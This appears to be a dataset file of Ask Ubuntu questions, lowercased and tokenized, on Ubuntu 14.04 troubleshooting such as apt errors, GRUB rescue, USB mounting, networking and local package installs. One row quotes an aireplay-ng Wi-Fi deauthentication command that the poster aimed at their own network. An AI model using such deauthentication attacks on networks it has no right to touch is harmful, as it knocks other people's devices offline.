493180	`` method gave invalid 400 uri failure message '' when running `` apt-get update ''	when i use the command sudo apt-get update i get the error message method gave invalid 400 uri failure message . the odd thing is every time i use the command it crashes at a different spot . for example : $ sudo apt-get update ign http : //dl.google.com stable inrelease ign http : //archive.ubuntu.com saucy inrelease ign http : //ppa.launchpad.net saucy inrelease hit http : //dl.google.com stable release.gpg ign http : //archive.ubuntu.com saucy-updates inrelease ign http : //ppa.launchpad.net saucy inrelease hit http : //dl.google.com stable release ign http : //ppa.launchpad.net saucy inrelease hit http : //dl.google.com stable/main amd64 packages ign http : //ppa.launchpad.net saucy inrelease get:1 http : //ppa.launchpad.net saucy release.gpg [ 316 b ] ign http : //archive.ubuntu.com saucy-security inrelease get:2 http : //ppa.launchpad.net saucy release.gpg [ 316 b ] e : method gave invalid 400 uri failure message here is the output of wget -d http : //ppa.launchpad.net/ -o /tmp/outputfile.log : $ wget -d http : //ppa.launchpad.net/ -o /tmp/outputfile.logsetting -- output-file ( logfile ) to /tmp/outputfile.log debug output created by wget 1.14 on linux-gnu . uri encoding = ‘utf-8’ -- 2014-07-10 13:48:37 -- http : //ppa.launchpad.net/ resolving ppa.launchpad.net ( ppa.launchpad.net ) ... 91.189.95.83 caching ppa.launchpad.net = > 91.189.95.83 connecting to ppa.launchpad.net ( ppa.launchpad.net ) |91.189.95.83|:80 ... connected . created socket 4 . releasing 0x0000000000f3dde0 ( new refcount 1 ) . -- -request begin -- - get / http/1.1 user-agent : wget/1.14 ( linux-gnu ) accept : */* host : ppa.launchpad.net connection : keep-alive -- -request end -- - http request sent , awaiting response ... -- -response begin -- - http/1.1 200 ok date : thu , 10 jul 2014 12:48:40 gmt server : apache/2.2.22 ( ubuntu ) vary : accept-encoding keep-alive : timeout=5 , max=100 connection : keep-alive transfer-encoding : chunked content-type : text/html ; charset=utf-8 -- -response end -- - 200 ok registered socket 4 for persistent reuse . uri content encoding = ‘utf-8’ length : unspecified [ text/html ] saving to : ‘index.html’ 0k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 7.72k 50k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 13.3k 100k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 12.6k 1850k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 19.2k 1900k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 8.97k 1950k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... 18.2k=2m34s 2014-07-10 13:52:18 ( 12.9 kb/s ) - ‘index.html’ saved [ 2041092 ] here are my locale information : $ locale lang=en language=en lc_ctype= '' en_ca.utf8 '' lc_numeric= '' en_ca.utf8 '' lc_time= '' en_ca.utf8 '' lc_collate= '' en_ca.utf8 '' lc_monetary= '' en_ca.utf8 '' lc_messages= '' en_ca.utf8 '' lc_paper= '' en_ca.utf8 '' lc_name= '' en_ca.utf8 '' lc_address= '' en_ca.utf8 '' lc_telephone= '' en_ca.utf8 '' lc_measurement= '' en_ca.utf8 '' lc_identification= '' en_ca.utf8 '' lc_all=en_ca.utf8
493182	stuck in grub rescue mode , all partitions - > `` unknown filesystem ''	i somehow messed up my laptop ... i have a dual boot machine with ubuntu 14.04 and windows 7 . the ubuntu os has been installed a couple of days ago and i was encountering an annoying bug : when booting on ubuntu i got the `` errors were found while checking the disk drive for / '' message . i dealt with it by editing the grub2 boot entry : linux /boot/vmlinuz-3.13.0-24-generic root=uuid=aac884ac1f144321 loop=/ubuntu/disks/root.disk ro quiet splash $ vt_handoff from `` ro '' to `` rw '' it worked , but when i booted one day later i got into grub rescue mode with message : '' unknown file system '' '' ls '' command gives me the 4 partitions , but they 're all msdos : grub rescue > ls ( hd0 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) when i try to use `` ls '' with any of the partitions above to locate the grub modules i always get 'unknown filesystem ' : grub rescue > ls ( hd0 , msdos6 ) ( hd0 , msdos6 ) : filesystem is unknown grub rescue > ls ( hd0 , msdos5 ) ( hd0 , msdos6 ) : filesystem is unknown grub rescue > ls ( hd0 , msdos2 ) ( hd0 , msdos6 ) : filesystem is unknown grub rescue > ls ( hd0 , msdos1 ) ( hd0 , msdos6 ) : filesystem is unknown booting from usb is not an option because the usb drive does n't even appear in the boot menu options ( and yes , i 'm sure it 's bootable ) . what 's wrong ? system diagnostics says the memory is fine and the primary hard disk self test runs fine for the short test but freezes at 8 % for the long one . system recovery just gets me again in the grub rescue mode . please help , i 'm not a very experienced user and this is the first time i have to deal with this kind of issue .
493183	ca n't load a usb key formatted on a windows machine	i 'm trying to read files off a usb that was formatted as fat32 on a windows machine . when i plug it into my usb drive , it says : `` could not mount the following disk : usb disk '' . and then in the dolphin file explorer , i see the following message at the bottom of the screen : `` an error occurred while accessing 'usb disk ' , the system responded : an unspecified error has occurred . : daemon is inhibited '' . i 'm not sure why this is the case . i noticed that in gparted , there is an option to format a drive as fat32 ... so ubuntu should be able to read fat32 drives , i assume any suggestions would be appreciated . thanks .
493184	uninstall-ubuntu.exe doesnt start win8	i started to install ubutu 14 and then installition wasnt response so i closed my computer.then i tried to install it again but it keep sayin that previous installition was detected remove it before continue . i tried to delete ubuntu from add/remove programs i wont work . so i downloaded uninstall-ubuntu.exe but when i click it nothing happens . i also followed the tutorial that says remove ubuntu manually but there was no c : /ubuntu folder . i did other steps but im keep getting same warning . im using windows 8.1
493186	launch app with absolute path does not woks	i 'm quite new in linux environments , but for this one , i need help on bash . i 'm on kubuntu 14.04 x64 i have an embedded jre for my business application , placed like this : app_root/run.sh ( my script ) app_root/jre/bin/java ( executable from oracle jre ) app_root/app/somejars.jar in my script i launch the java app like this : /home/foo/app_root/jre/bin/java ( some_options ) -jar ( my_main_jar ) etc ... but it raise a 'no file or directory found ' ( code 127 ) ! ! ! on other computers , this script launch correctly the jre another test i made , in konsole , if type /home/foo/app_root/jre/bin/java , i 've got the error . but i change dir : cd /home/foo/app_root/jre/bin and i type : java . it works ! what 's the matter with this ?
493187	dvd drive not detected in ubuntu , windows and bios	i installed ubuntu 4 days ago on my system and since then my pc seems to be ruined . windows boot time has increased like 4 or 5 times . ubuntu takes about 2 minutes to boot and worst of all , my dvd drive has vanished from all os as well as bios . please help me . note : i had applied the changes in the tutorial in the following link . http : //itsfoss.com/things-to-do-after-installing-ubuntu-14-04/
493189	why is ubuntu 14.04 so slow on my laptop ?	i just installed ubuntu 14.04 on a dell laptop with 1.7ghz pentium m and 1gbyte memory . graphics are intel速 852gm/855gm x86/mmx/sse2 , os type is 32bit . the whole system is very slow . when i launch the applications manager , for example , i need to wait in order to see the letters i typed appear ! it is as if the cpu was overloaded and no memory available , but i only have firefox running . how can i make the system run smoother ? it used to have windows xp installed and it worked fine .
493191	wired usb ethernet connection disconnecting sporadicly	first , i 'm not a linux pro , so please forgive me if i write any nonsence : ) so i have quite an unusual constellation . i 'm running a ubuntu 14.04 virtual machine on my mac pro using vmware fusion 6 . because i have to forward ports ( for an owncloud installation ) for a specific and unchanging mac adress on my router , i have connected a usb ethernet adapter and connected it to the vm . now everything workes fine for many hours but then the ethernet interface looses its link to the switch . the network manager tells me that the cable has been unplugged . after setting networking to disabled and enabled again the network reconnects . in a few hours it will disconnect again . i tried 2 adapters ( both asix ax88179 ) , 2 different switches and of course different cables . i am sure that this method ( conecting a usb ethernet adapter to a vm ) workes flawlessly on both a mac os x vm ( never had any network problems in 2 years ) and windows vm ( had been running perfect for about 6 months ) . does anyone have an idea what is going on here ? i added some systemlog messages but from my perspective it lookes like the cable disconnected : jul 8 12:39:01 carbon cron [ 3882 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -x /usr/lib/php5/sessionclean ] & & [ -d /var/lib/php5 ] & & /usr/lib/php5/sessionclean /var/lib/php5 $ ( /usr/lib/php5/maxlifetime ) ) jul 8 12:45:34 carbon kernel : [ 1989.296243 ] ax88179_178a 1-1:1.0 eth1 : ax88179 - link status is : 0 jul 8 12:45:34 carbon networkmanager [ 914 ] : < info > ( eth1 ) : carrier now off ( device state 100 , deferring action for 4 seconds ) jul 8 12:45:38 carbon networkmanager [ 914 ] : < info > ( eth1 ) : device state change : activated - > unavailable ( reason 'carrier-changed ' ) [ 100 20 40 ] jul 8 12:45:38 carbon networkmanager [ 914 ] : < info > ( eth1 ) : deactivating device ( reason 'carrier-changed ' ) [ 40 ] jul 8 12:45:38 carbon kernel : [ 1993.414886 ] ipv6 : addrconf ( netdev_up ) : eth1 : link is not ready jul 8 12:45:38 carbon avahi-daemon [ 679 ] : withdrawing address record for fe80 : :a2ce : xxxx : xxxx : xxxx on eth1 . jul 8 12:45:38 carbon avahi-daemon [ 679 ] : leaving mdns multicast group on interface eth1.ipv6 with address fe80 : :a2ce : xxxx : xxxx : xxxx . jul 8 12:45:38 carbon avahi-daemon [ 679 ] : interface eth1.ipv6 no longer relevant for mdns . jul 8 12:45:38 carbon avahi-daemon [ 679 ] : withdrawing address record for 192.168.0.xx on eth1 . jul 8 12:45:38 carbon avahi-daemon [ 679 ] : leaving mdns multicast group on interface eth1.ipv4 with address 192.168.0.202 . jul 8 12:45:38 carbon avahi-daemon [ 679 ] : interface eth1.ipv4 no longer relevant for mdns . jul 8 12:45:38 carbon dnsmasq [ 1447 ] : setting upstream servers from dbus jul 8 12:45:38 carbon networkmanager [ 914 ] : < warn > dns : plugin dnsmasq update failed jul 8 12:45:38 carbon networkmanager [ 914 ] : < info > removing dns information from /sbin/resolvconf jul 8 12:12:59 carbon whoopsie [ 1195 ] : online jul 8 12:45:38 carbon whoopsie [ 1195 ] : offline jul 8 12:45:39 carbon networkmanager [ 914 ] : < info > networkmanager state is now disconnected jul 8 12:45:39 carbon dbus [ 606 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) jul 8 12:45:39 carbon dbus [ 606 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' jul 8 12:45:40 carbon ntpd [ 2009 ] : deleting interface # 5 eth1 , fe80 : :a2ce : xxxx : xxxx : xxxx # 123 , interface stats : received=0 , sent=0 , dropped=0 , active_time=1957 secs jul 8 12:45:40 carbon ntpd [ 2009 ] : deleting interface # 3 eth1 , 192.168.0.xx # 123 , interface stats : received=151 , sent=151 , dropped=0 , active_time=1957 secs jul 8 12:45:40 carbon ntpd [ 2009 ] : 91.189.x.x interface 192.168.0.xx - > ( none ) jul 8 12:45:40 carbon ntpd [ 2009 ] : 217.79.x.x interface 192.168.0.xx - > ( none ) jul 8 12:45:40 carbon ntpd [ 2009 ] : 134.106.x.x interface 192.168.0.xx - > ( none ) jul 8 12:45:40 carbon ntpd [ 2009 ] : 129.70.x.x interface 192.168.0.xx - > ( none ) jul 8 12:45:40 carbon ntpd [ 2009 ] : 109.75.x.x interface 192.168.0.xx - > ( none ) jul 8 12:45:40 carbon ntpd [ 2009 ] : peers refreshed
493195	bindfs in fstab	i am struggling to get this to work properly . this works in terminal sudo bindfs -u dave /media/dave/documentary2lin/raidmain/documentary2 ~/shares/documentary2 how do i get this to work in fstab ? i 've tried /media/dave/documentary2lin/raidmain/documentary2 ~/shares/documentary2 fuse.bindfs force-user=dave perms=a=rx 0 0 it gives an error in fstab
493196	i deleted windows8 and installed ubuntu 14.04 but now i cant boot	boot repair discovered this for me http : //paste.ubuntu.com/7766025/ every time i try to boot there is no boot device detected
493197	unable to get error stack trace or error log while using php-fpm + nginx on ubuntu 14.04	i am using php-fpm 5.5.9 along with nginx 1.4.6 on my ubuntu 14.04 machine . i have installed them using apt-get package manager . i am unable to get a stack trace of the error that my index.php script encounters in error log as well as on the browser . i searched and implemented a couple of solutions from stackoverflow and other articles but none of them worked for me . here is my nginx conf along with my php-fpm conf file . please help me out if i am doing any silly mistake . nginx configuration : location ~ \.php $ { # with php5-fpm : # try_files $ uri =404 ; include fastcgi_params ; fastcgi_param script_filename $ document_root $ fastcgi_script_name ; fastcgi_intercept_errors on ; fastcgi_read_timeout 600 ; fastcgi_send_timeout 600 ; proxy_connect_timeout 600 ; proxy_send_timeout 600s ; proxy_read_timeout 600s ; fastcgi_pass 127.0.0.1:7777 ; fastcgi_index index.php ; } php-fpm configuration : error_log = /tmp/php5-fpm.log php-fpm pool configuration : catch_workers_output = yes slowlog = /var/log/php-fpm/ $ pool.log.slow listen = 127.0.0.1:7777 php_flag [ display_errors ] = on php_admin_value [ error_log ] = /tmp/fpm-php.www.log php_admin_flag [ log_errors ] = on thanks in advance .
493198	what is a .fuse_hidden file and why do they exist ?	i have a folder where i transfer home videos from a camcorder to . i find two files in this folder that are not videos ... .fuse_hidden0000002c00000001 .fuse_hidden0000002600000002 what are these files , and can they be safely deleted ?
493200	ubuntu 14.04 nvidia-prime	i have a laptop with the nvidia geforce gt 420m . i have installed the 331 nvidia drivers and the nvidia-prime but when i run nvidia-settings i get the message : ** message : prime : no offloading required . abort ** message : prime : is it supported ? no what is the problem ?
493201	maas network configuration error and issue	i have tried a couple times to get maas up and running and the issues seems to be incorrect network configuration . i have a server with 2 net ports . em1 is the network for maas and the servers that will use pxe to boot . em2 is the dhcp internet network . so the interfaces file looks like this : auto em1 iface em1 inet static address 10.0.0.2 netmask 255.255.255.0 gateway 10.0.0.2 network 10.0.0.0 broadcast 10.0.0.255 dns-nameservers 10.0.0.2 auto em2 iface em2 inet dhcp the sysctl.conf file has port forwarding turned on with net.ipv4.ip_forward=1 . the intent is that the 10.0.0.0 network is the maas network and the maas controller is the dns / dhcp and router for the pxe clients on the 10.0.0.0 network . the 192.168.3.0 network is the internet access . with this config ( 10.0.0.0 is the primary network ) i can ping 3.66 ( myself ) , 3.1 ( the dhcp router address and that is it . trying to ping the outside of the 3.1 router to access the internet is unreachable . i have tried setting default routes but it always says the file exists . i need to get the configuration correct so that the pxe servers will see the 10.0.0.2 server as their dhcp and i need to get the maas server to reach the internet . any help in getting this configuration correct would be greatly appreciated .
493204	wrong left-handed behavior in wacom tablet	when i enable the left-handed orientation setting in system settings > > wacom tablet , the pen is mirrored . i am left-handed but i never mirrored my gestures . this is the right behavior or this setting has a bad name ? see wacom settings page : http : //i.stack.imgur.com/uqlyc.png
493207	need help with a printer . ( hp c4580 )	i 've been trying to get my printer set up ( hp photosmart c4580 ) and i got the hp software on but when i try to print out a page , no matter what , it just freezes on pending yet it does n't have a problem cancelling . is there something i can run in the command line to fix the problem ? i tried finding a download firmware option but nothing . when i check the device info , i get fw-download false . i already have hplip .
493208	in kde when i create a file in the home directory it also creates files on the desktop	whenever i create an new file in my home directory in dolphin it also create the same file on my desktop and on my widget ( folder viewer . ) how can i fix this ? it worked fine until now , but it just started doing this recently and i do n't recall doing any changes to the system .
493211	can not move windows to second screen	i have an external monitor plugged into my notebook , but i can not move windows from the bottom screen ( built-in screen ) to the upper screen ( external monitor ) . the windows stick at the top border ( below the panel ) of the built-in screen , while the mouse moves into the second screen . i think , it 's because of the top panel ; it works if i place the external monitor below the built-in screen . how can i solve this issue ? or move windows directly without using drag and drop .
493212	find and download a package without sudo using aptitude	i would like to install a bunch of packages ( glogg , libprotobuf7 , libleveldb1 , libsnappy1 , libhdf5-7 ) on an ubuntu system on which i do not have root privileges . ( i understand that this can be achieved by forcing the downloading and installation to take place on my home directory for example ) . i would like to do this as fast as possible , e.g using apt ( rather than manually searching the web for a link address to the package , then wget-ing it , then opening the tarball , then reading the install file to install correctly etc ) . is there a way to do this ? how can i install a package without root access ? has a 1st answer that assumes that we have the .deb file already downloaded . this is not my case ( and if you know of a way to get it quickly without scouring the web , i 'd love to know ) .
493214	how can i log acpi temperatures ?	i 'm trying to debug why my computer randomly shuts down sometimes , and to rule out temperature issues ( since i do n't think that 's the case ) i would like to log the output of acpi -t somewhere so when it shuts down i can review what happened . i know of the lm-sensors package as talked about in this question , but i 'd like to avoid installing another package ( s ) and simply use the terminal . i tried using watch acpi -t > > temp.log , but the output is all garbled - temp.log how do i log the output of acpi -t on intervals correctly ?
493228	how to change photorec 's output filefolder	due to a wrong hd firmat instead off hdd need badly to use photorec . how do i change photorec 's output filefolder to the public file folder ?
493232	silverlight in ubuntu 14.04	i want to enable silverlight on ubuntu 14.04 . i have seen this question that provides a link to moonlight . however , the latest version of moonlight , seem to support only mac , windows and opensuse , while the previous version does not support ubuntu 14.04 . how is it possible for users of ubuntu 14.04 to use an application similar with silverlight ?
493240	how to delete all files of a specefic name from / ?	i want to delete all files named typhoon.svg from / partition . how to do that via command line ?
493244	how to align a set of names in alphabetical order using libre office	i just want to make a list of botanical names and i want them to be aligned in alphabetical order . i know we can do it using libre office but how ? .
493246	retrieving contact list from ubuntu one	after recent ubuntu one shutdown , you have the possibility to retrieve your files . however , i had quite big contact list in ubuntu one , and downloader did n't seemt to download it in any form . are contants retrievable from ubuntu one ?
493247	how can i install icq on ubuntu 14.04 ?	a lot of people are coming back to icq because it was updated and now can compete with whatsapp . i 'm trying to install the newest icq on ubuntu but i having trouble with that . i access the following adress : http : //www.icq.com/download/linux/en , so i try to click on `` download icq '' button , however anything happens . i did n't found any other link to download icq in the official website . someone can help me ? edit to louis matthijssen answer : well , i follow what you said . i downloaded chromium and go to icq for linux download page . the installation almost works , the page tells me to download and install adobe air , i clicked in `` yes '' and wait while the adobe air was installed . after that i receive the following error :
493255	how to make a script that will make another script in the same folder executable ?	how to make a script that will make another script in the same folder executable ? i do n't want to worry about path since it will be in the same directory . so it should be something like ( i 'm trying to make d3go script executable ) : # ! /bin/bash chmod +x `` $ pwd '' /d3go i 'm very new to scripts so pls do n't laugh : d thanks !
493258	dnsmasq getting log spam from use of macvlan interfaces	i 'd like to know if this procedure will work for creating virtual eth interfaces inside an lxc . it seems to work for awhile then i get a spam of these every couple seconds . jul 10 16:54:22 dnsmasq-dhcp [ 2291 ] : dhcpack ( bpbr ) 172.16.17.176 88:88:0d:5b:0f : bc macvlan13 jul 10 16:54:23 dnsmasq-dhcp [ 2291 ] : dhcprequest ( bpbr ) 172.16.17.16 88:88:62:59:5c : fb jul 10 16:54:23 dnsmasq-dhcp [ 2291 ] : dhcpack ( bpbr ) 172.16.17.16 88:88:62:59:5c : fb macvlan5 here is how i allocate the macvlans inside an lxc . instructions : 1 ) init eth0 ip link set up dev eth0 2 ) create a custom dhclient.conf file . we want to register a unique hostname with each virtual macvlan interface to avoid confusion in the system . cat /etc/dhcp/dhclient.conf | sed 's/ < hostname > /macvlan0/ ' > /etc/dhcp/dhclient_macvlan0.conf 3 ) here is the main work . create the interface using a randomly generated mac ip li add link eth0 dev macvlan0 address [ random mac address ] type macvlan 4 ) call dhclient to allocate an ip address . i want this ability the most so i do n't need to deal with reserving ip addresses . dhclient -cf /etc/dhcp/dhclient_macvlan0.conf macvlan0 the one artifact here if i create 10 macvlan interfaces , i run dhclient 10 times , once for each interface . not sure if that is a bad thing . thanks for any help in my method and also why dnsmasq is getting spammed .
493259	getting sftp to update wordpress	it took me a while to figure out how to install sftp , and set up a user , sftpwp , that was restricted to it 's own home directory and to using only those commands that are internal to sftp . i created a symbolic link between /var/www in the home directory of user sftpwp . this is on ubuntu 12.04 . ( i do n't run the more recent releases of ubuntu because they do n't seem to like the kvm i use to access this machine directly ) . alas , i get the following error when i try to update wordpress . could not copy file . : wordpress/wp-admin/includes/update-core.php i know sftp is working , and observed wordpress ' panel saying it successfully downloaded an update file : but then it stopped at the above error . i tried to get help on the wordpress forum , but was told that because this is an administrative issue , it was off topic for the wordpress fora . so , what might be the problem : restricting the user sftpwp to only what is internal to sftp , or restricting it to it 's home directory , or is it some other permissions issue ? and , what would be the fix ? please remember , i am not an administrator , but rather a programmer . thanks , ted
493262	fat32 formatting	i just took a dive into the ubuntu world jumping from windows 7 to ubuntu 14.04 . i must say that i am impressed , i do like it a lot . however , i just ran into an unexpected problem ; i have an lg dvd player w/usb support that i use to watch videos . the problem is that the player no longer reads the files in my usb drive , it says that there are no files at all . i started getting this issue after i re-formatted the usb drive using fat32 in ubuntu . is windows fat32 different than ubuntu 's ? it must be even though it should n't because the player is no longer able to read the files ( or partition ? ) . is there an ubuntu tool/utility that will allow me to do a `` windows fat32 format '' ? i will really like to keep ubuntu but i wo n't be able to if i can not get my pen drive working on my dvd player . any suggestions guys ? thanks in advance for your help ?
493265	tlmgr texlive 2013 in ubuntu 14.4	i am new so i hope that i 'm asking in the right way . i have the following problem : on my ubuntu 14.4 machine i installed texlive from the official repositories . this is the list of all installed packages containing `` tex '' : luatex install preview-latex-style install tex-common install texlive-base install texlive-bibtex-extra install texlive-binaries install texlive-extra-utils install texlive-font-utils install texlive-generic-recommended install texlive-lang-english install texlive-lang-german install texlive-latex-base install texlive-latex-base-doc install texlive-latex-extra install texlive-latex-extra-doc install texlive-latex-recommended install texlive-latex-recommended-doc install texlive-latex3 install texlive-luatex install texlive-pictures install texlive-pictures-doc install texlive-pstricks install texlive-pstricks-doc install' now i encountered an error about missing a font and as described here i wanted to install the missing package ( s ) using tlmgr . unfortunately , the texlive repository thinks my install outdated : anjuta @ x : ~ $ tlmgr install ec ( running on debian , switching to user mode ! ) tlmgr : the tex live versions supported by the repository http : //ftp.fau.de/ctan/systems/texlive/tlnet ( 2014 -- 2014 ) do not include the version of the local installation ( 2013 ) . ' is this my true problem ? do i have to install texlive 2014 manually ? how is it possible that in a brandnew os 's repositories packages are outdated to the extend that they 're not supported anymore ? i hope you can help me with this . thanks in advance .
493266	how to install grub2 ?	i have installed ubuntu 14.04 with windows 8 ( dual-boot ) , and i want to set grub ( 2 ) to boot first . how do i do that ? edit when trying boot-repair i got the following error : sudo apt-get update [ trimmed ] fetched 432 kb in 9s ( 45.7 kb/s ) w : failed to fetch gzip : /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_trusty_main_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_trusty_main_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_trusty_main_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . i think i got this error because my isp filters some web-sites .
493268	change current working directory only by typing the name of the new one	something similar to this q & a , i know that cd will change current working directory in terminal to a new directory like this : cd /path/to/new_directory but i wonder how can i change current working directory only by typing for example : /path/to/new_directory followed by enter , of course . nothing more .
493271	prime indicator enormous in xfce-panel	i installed prime-indicator , which allows to quickly switch between intel and nvidia graphics cards , as reported here : http : //www.webupd8.org/2014/01/prime-indicator-lets-you-quickly-switch.html no problems with unity or gnome shell , but here what happens in xfce4 environment , with the appindicator plugin : how to solve ?
493275	ubuntu 14.04 does not connect ınternet	i was usıng ubuntu 14.04 on my laptop and i had to reınstall ıt . so i just created a bootable 14.04 usb stıck and formatted ıt . the new ubuntu 14.04 normally opened and to connect ınternet i put the ethernet cable to laptop . the `` connected to ınternet ; wıred connectıon '' warnıng showed up so ıt looks lıke everythıng ıs fıne . but when i sımply try to use fırefox or updater , ıt says connected faıled ! i dont really know how ıt possıble , just one hour ago i was usıng ubuntu 14.04 normally , and i trıed to re-ınstall ıt but now ! holy crap ! any help please ? thanks advance .
493276	problem copy files to virtualbox ubuntu guest share drive	windows 7 host system . oracle vm virtualbox 4.3.12 . ubunti guest 14.05. dkms installed . mounted share drive via virtualbox . checked `` auto mount '' and `` make permanent '' but did not check `` read only '' . from ubuntu , can copy files out of shared folder to local ubuntu folder . can `` touch '' or `` vi '' new files in share folder . but can not `` cp '' files to share folder ; get `` protocol error '' . local ubuntu login is member of vboxsf which is group of /media/sf_xxx that i am attempting to copy files to . why would ubuntu allow me to `` touch '' and `` vi '' files in /media/sf_xxx but not `` cp '' files to /media/sf_xxx ? thanks .
493277	launch gnome-terminal into gui via tty	my gui is completely messed up and i need to get the gnome terminal working . ctrl-alt-t does n't work because unity or gnome are broken . all i 'm getting is a mouse and another program that i launched with other keys . i need to login into tty ( ctrl+alt+f1 ) and write a command that will open the gnome terminal in the gui ( ctrl+alt+f7 ) . i already tried nohup and some other command i do n't remember . i have also tried placing the terminal into startup but it did n't start at boot .
493281	what 's wrong with this .desktop file ?	i ca n't figure out what 's wrong with this . according to this , it should work . thanks ! [ desktop entry ] version=1.0 name=d3go comment=d3go televizija preko interneta exec=~/d3go/d3go path=~/d3go/ icon=~/d3go/d3go.png terminal=false type=application categories=application ;
493288	unable to de-authenticate the clients using aireplay-ng	i was trying to de-authenticate the client on one of my personal wifi using aireplay-ng . but it gave error : root @ htcodersinc : /home/ht # aireplay-ng -0 1 -a 08:3e:8e:1f:10 : b6 -e `` balli ka network '' mon0 00:35:19 waiting for beacon frame ( bssid : 08:3e:8e:1f:10 : b6 ) on channel -1 00:35:19 could n't determine current channel for mon0 , you should either force the operation with -- ignore-negative-one or apply a kernel patch the wifi was running on channel 11 and has wp2 encryption .
493290	wireless and wired connections no longer working	i am currently running ubuntu 14.04 on an asus eeepc netbook . everything was working fine until randomly i was unable to connect to my wireless , or any wireless for that matter . when i tried to , i would get the following message : 'failed to add/activate connection ' and on the next line : ' ( 32 ) insufficient privileges ' . i plugged in my ethernet cable , and it was able to connect to a wired connection . however , after a week , the wired connection also stopped working . when i look at available networks , the top entry 'ethernet network ' is greyed out even though the cable is connected . now inman unable to connect to any network . i currently use either xfce or xubuntu as my desktop environment . any questions or ideas , please let me know . thanks !
493292	deleted initrd and restarted	i deleted intrid linux-image and then i accidently restarted and now whenever i boot the computer it it opens memtest is there a fix ? i have the cd i made still and i have ubuntu 14.04 server im fine with deleting every thing except one folder i need stuff in /var/www/ but it wont let me go into shell in sda1 or sda2 or anything before i tried to fix the error anytime i tried to install something through apt-get it said e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so i tried to fix and all of this stuff started . thanks
493294	what does acpi -t measure ?	whenever i use acpi -t , no matter what i 'm doing , the temperature it displays is the same : thermal 0 : ok , 14.0 degrees c so to try and figure out why that is , i go to the man page : acpi shows information from the /proc or the /sys filesystem , such as battery status or thermal information . this is n't that useful to someone like me who does n't have a terribly in-depth understanding of the linux kernel and whatnot , and the description of the -t option is n't any better : -t | -- thermal show thermal information can anyone explain what acpi -t is measuring to get it 's information ?
493295	windows xp to linux ?	i am completely a novice at computers please can anyone provide basic easy to follow instructions of how to install ubuntu on my elderly toshiba laptop currently running windows xp . and is ubuntu my best option ? thankyou
493303	can the path variable be corrupted ?	i installed rbenv , a ruby version management program . i looked in the .bashrc file and noticed that the path variable was changed as below : export path= '' $ home/.rbenv/bin : $ path '' i think the `` : $ path '' part was included to include the old path contents . i would like to know what would happen if a program that modifies the path variable does n't include the `` : $ path '' part . would i not be able to run some programs from the command line since the bin directories in which they reside are no longer included in the new path variable ?
493306	how can i store the value an user enters in a variable ?	how can i store the value an user enters in a variable ? for example i have this code textfield { width : 37 ; height : 19 var id : q1 x : 91 y : 29 anchors.horizontalcenter : parent.horizontalcenter anchors.verticalcenter : parent.verticalcenter anchors.centerin : parent placeholdertext : `` 0 '' font.pixelsize : 12 text : `` '' anchors.verticalcenteroffset : 26 anchors.horizontalcenteroffset : -115 validator : intvalidator { } horizontalalignment : textinput.alignhcenter style : textfieldstyle { textcolor : `` black '' background : rectangle { width : 45 ; height : 25 ; radius : 20.0 color : `` # f0ebeb '' implicitwidth : 40 implicitheight : 24 border.color : `` # 000000 '' border.width : 1 } } ontextchanged : { console.log ( parseint ( text,10 ) + 1000 ) } } can i use the id to later use and make the sum or the multiplication ? ? if yes then and how ? ?
493307	install glogg package with dpkg command and no root privileges	i 'm trying to install a package called glogg without root privileges . i have successfully downloaded the .deb file ( to $ home/packages/glogg ) . but when i run dpkg -i -- force-not-root -- root= $ home/.local glogg_0.9.1-1_amd64.deb from $ home/packages/glogg , i get dpkg : error : unable to access dpkg status area : no such file or directory however , glogg_0.9.1-1_amd64.deb is definitely in current directory . what 's wrong ? how can i install glogg_0.9.1-1_amd64.deb locally without root privileges ?
493308	how to list all programs installed that were compiled from source ?	programs installed from source code do not show up in package managers . is there another location that records all programs which were installed via compiling ?
493309	install ubuntu on a hardware aes encrypted flash drive	i could n't find the answer to my question after hours of search . i hope someone can help me out . i would like to install ubuntu on a flash drive . i followed to standard instructions for installing the latest ubuntu alternate i386 on a flash drive . however when going through the installation procedure i got stuck at the detection of drives . it ca n't see my flash drive . and probably i know why ... because it 's a hardware aes encrypted flashdrive so the usb stick will only be visible and unlocekd after onboard password verification . however this onboard password verification does not show up . how do i fix this problem ? got a integral courier dual fips 197 encrypted usb 3.0 thanks for the help !
493311	how to connect laptop to tv using a vga cable and a 3 rca cable	i would like step by step instructions showing me exactly how to do it especially with pictures to show me where the cables connect to . i do n't know what goes where and what program i need to connect a tv to a laptop to watch my movies .
493312	permission denied error when using easy_install	i am trying to use easy_install to install seaborn , a python package . i found however that easy_install is giving me issues for anything i try to install . i recive the following error message : [ errno 13 ] permission denied : '/usr/local/lib/python2.7/dist-packages/test-easy-install-18534.write-test' there is also an explanation that suggests i do not have administration permissions . this is not the case . any help would be appreciated .
